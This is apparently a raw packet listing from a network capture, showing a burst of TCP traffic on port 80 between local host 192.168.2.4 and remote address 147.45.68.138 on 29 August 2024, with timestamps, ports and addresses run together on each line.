                                                      Aug 29, 2024 22:52:21.066335917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.066364050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.066374063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.066404104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.066428900 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.069691896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.069750071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.069758892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.069792032 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.073121071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.073168993 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.073179007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.073204041 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.073242903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.073393106 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.076673985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.076700926 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.076709986 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.076735020 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.076759100 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.080171108 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.080182076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.080190897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.080221891 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.080235004 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.083399057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.083425999 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.083435059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.083467960 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.086776972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.086802006 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.086808920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.086842060 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.090198994 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.090207100 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.090240002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.090249062 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.092761993 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.093446970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.093491077 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.093502998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.093521118 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.093539000 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.093549967 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.096740007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.096750975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.096759081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.096784115 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.096803904 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.100111961 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.100236893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.100250959 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.100286007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.103460073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.103485107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.103493929 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.103529930 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.103540897 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.106837034 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.106863022 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.106870890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.106899977 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.106920004 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.110105991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.110152960 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.110162020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.110199928 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.113670111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.113681078 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.113688946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.113719940 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.116915941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.116966963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.116991043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.117028952 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.120018959 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.120029926 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.120038986 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.120070934 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.120080948 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.123326063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.123346090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.123354912 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.123393059 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.126332998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.126437902 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.126446962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.126482010 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.129461050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.129517078 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.129571915 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.129600048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.129642010 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.133322954 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.133359909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.133368015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.133375883 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.133389950 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.133398056 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.135303020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.135318041 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.135327101 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.135356903 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.135381937 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.138278961 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.138299942 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.138307095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.138355017 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.381937027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.381970882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.381990910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.381999016 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382004023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382014990 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382021904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382035971 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382040977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382050037 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382067919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382070065 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382081032 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382085085 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382097960 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382111073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382119894 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382119894 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382134914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382152081 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382158995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382169008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382169008 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382181883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382205009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382215023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382215977 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382230043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382237911 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382256985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382257938 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382271051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382277012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382282972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382293940 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382294893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382306099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382317066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382318974 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382327080 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382335901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382345915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382349014 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382359028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382366896 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382373095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.382385015 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.382404089 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.384417057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.384443998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.384469986 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.384504080 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.384526014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.384537935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.384560108 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.384569883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.384578943 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.384640932 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.387303114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.387363911 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.387636900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.387646914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.387655020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.387686014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.387697935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.387717009 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.387797117 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.388365030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.388375044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.388381004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.388386011 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.388391972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.388453007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.389131069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.389183044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.389194012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.389216900 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.389234066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.389236927 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.389245987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.389307022 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.391908884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.391954899 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.392307997 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.392388105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.392498016 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.392541885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.392709970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.392749071 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.392888069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.392940998 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.393994093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.394004107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.394010067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.394109011 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.394155979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.394166946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.394171953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.394176960 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.394181967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.394186974 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.394191980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.394196987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.394242048 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.394470930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.394531965 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.394797087 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.394808054 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.394813061 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.394865990 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.395220995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.395231962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.395279884 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.395546913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.395591021 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.395735979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.395747900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.395760059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.395765066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.395777941 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.395823956 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.396526098 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.396537066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.396567106 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.396603107 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.396807909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.396871090 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.396989107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.397032976 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.397224903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.397267103 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.398919106 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.398956060 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.399136066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.399209976 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.399410963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.399421930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.399447918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.399451017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.399462938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.399467945 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.399482965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.399486065 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.399494886 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.399501085 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.399504900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.399518013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.399533033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.399538040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.399543047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.399543047 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.399549007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.399554014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.399560928 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.399643898 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.400332928 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.400372028 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.400372028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.400388002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.400408983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.400423050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.400424957 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.400434971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.400446892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.400458097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.400470018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.400489092 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.401093006 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.401134968 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.401146889 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.401182890 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.401221991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.401257992 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.401274920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.401287079 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.401298046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.401309967 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.401323080 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.401329994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.401335955 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.401349068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.401355982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.401376009 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.401741028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.401784897 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.401789904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.401802063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.401828051 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.401838064 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.401839972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.401876926 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.402014017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.402031898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.402049065 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.402067900 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.402226925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.402237892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.402249098 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.402270079 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.402282000 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.402333021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.402349949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.402362108 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.402371883 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.402371883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.402388096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.402400970 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.402424097 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.402935982 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.402962923 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.402973890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.402983904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.402985096 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.402995110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.403006077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.403008938 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.403017044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.403028965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.403036118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.403038979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.403050900 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.403053999 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.403063059 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.403100014 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.404644012 CEST8049739147.45.68.138192.168.2.4
